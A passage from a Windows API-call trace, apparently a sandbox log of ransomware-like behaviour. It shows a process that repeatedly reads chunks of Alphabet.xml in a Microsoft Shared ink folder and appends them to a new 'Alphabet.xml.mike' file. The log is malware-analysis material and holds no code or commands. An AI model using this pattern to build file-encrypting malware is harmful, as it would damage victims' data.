(lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.775] GetFileType (hFile=0x264) returned 0x1 [0042.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.775] GetFileType (hFile=0x264) returned 0x1 [0042.775] ReadFile (in: hFile=0x264, lpBuffer=0x22c2298, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22c2298*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.776] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.777] GetFileType (hFile=0x264) returned 0x1 [0042.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.777] GetFileType (hFile=0x264) returned 0x1 [0042.777] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5f220 [0042.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.777] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.777] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.777] GetFileType (hFile=0x264) returned 0x1 [0042.777] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.777] GetFileType (hFile=0x264) returned 0x1 [0042.777] ReadFile (in: hFile=0x264, lpBuffer=0x22cf240, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22cf240*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.779] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.780] GetFileType (hFile=0x264) returned 0x1 [0042.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.780] GetFileType (hFile=0x264) returned 0x1 [0042.780] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x61a20 [0042.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.780] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.780] GetFileType (hFile=0x264) returned 0x1 [0042.780] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.780] GetFileType (hFile=0x264) returned 0x1 [0042.781] ReadFile (in: hFile=0x264, lpBuffer=0x22dc1e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22dc1e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.782] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.782] GetFileType (hFile=0x264) returned 0x1 [0042.782] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.782] GetFileType (hFile=0x264) returned 0x1 [0042.782] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x64220 [0042.783] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.783] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.783] GetFileType (hFile=0x264) returned 0x1 [0042.783] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.783] GetFileType (hFile=0x264) returned 0x1 [0042.783] ReadFile (in: hFile=0x264, lpBuffer=0x22e9190, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22e9190*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.785] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.785] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.785] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.786] GetFileType (hFile=0x264) returned 0x1 [0042.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.786] GetFileType (hFile=0x264) returned 0x1 [0042.786] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x66a20 [0042.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.786] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.786] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.786] GetFileType (hFile=0x264) returned 0x1 [0042.786] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.786] GetFileType (hFile=0x264) returned 0x1 [0042.786] ReadFile (in: hFile=0x264, lpBuffer=0x20f1710, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20f1710*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.788] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.788] GetFileType (hFile=0x264) returned 0x1 [0042.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.788] GetFileType (hFile=0x264) returned 0x1 [0042.788] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x69220 [0042.788] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.788] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.788] GetFileType (hFile=0x264) returned 0x1 [0042.788] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.788] GetFileType (hFile=0x264) returned 0x1 [0042.789] ReadFile (in: hFile=0x264, lpBuffer=0x20fe6b8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x20fe6b8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.790] GetFileType (hFile=0x264) returned 0x1 [0042.790] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.790] GetFileType (hFile=0x264) returned 0x1 [0042.790] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x6ba20 [0042.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.790] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.790] GetFileType (hFile=0x264) returned 0x1 [0042.791] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.791] GetFileType (hFile=0x264) returned 0x1 [0042.791] ReadFile (in: hFile=0x264, lpBuffer=0x210b660, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x210b660*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.792] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.792] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.792] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.792] GetFileType (hFile=0x264) returned 0x1 [0042.792] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.792] GetFileType (hFile=0x264) returned 0x1 [0042.792] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x6e220 [0042.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.796] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.796] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.796] GetFileType (hFile=0x264) returned 0x1 [0042.796] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.796] GetFileType (hFile=0x264) returned 0x1 [0042.796] ReadFile (in: hFile=0x264, lpBuffer=0x2118608, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2118608*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.797] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.797] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.797] GetFileType (hFile=0x264) returned 0x1 [0042.797] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.797] GetFileType (hFile=0x264) returned 0x1 [0042.797] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x70a20 [0042.798] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.798] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.798] GetFileType (hFile=0x264) returned 0x1 [0042.798] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.798] GetFileType (hFile=0x264) returned 0x1 [0042.798] ReadFile (in: hFile=0x264, lpBuffer=0x21255b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21255b0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.818] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.819] GetFileType (hFile=0x264) returned 0x1 [0042.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.819] GetFileType (hFile=0x264) returned 0x1 [0042.819] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x73220 [0042.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.819] GetFileType (hFile=0x264) returned 0x1 [0042.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.819] GetFileType (hFile=0x264) returned 0x1 [0042.819] ReadFile (in: hFile=0x264, lpBuffer=0x2132558, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2132558*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.821] GetFileType (hFile=0x264) returned 0x1 [0042.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.821] GetFileType (hFile=0x264) returned 0x1 [0042.821] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x75a20 [0042.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.822] GetFileType (hFile=0x264) returned 0x1 [0042.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.822] GetFileType (hFile=0x264) returned 0x1 [0042.822] ReadFile (in: hFile=0x264, lpBuffer=0x213f500, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x213f500*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.823] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.823] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.823] GetFileType (hFile=0x264) returned 0x1 [0042.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.823] GetFileType (hFile=0x264) returned 0x1 [0042.823] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x78220 [0042.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.824] GetFileType (hFile=0x264) returned 0x1 [0042.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.824] GetFileType (hFile=0x264) returned 0x1 [0042.824] ReadFile (in: hFile=0x264, lpBuffer=0x214c4a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x214c4a8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.825] GetFileType (hFile=0x264) returned 0x1 [0042.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.825] GetFileType (hFile=0x264) returned 0x1 [0042.825] SetFilePointer (in: hFile=0x264, 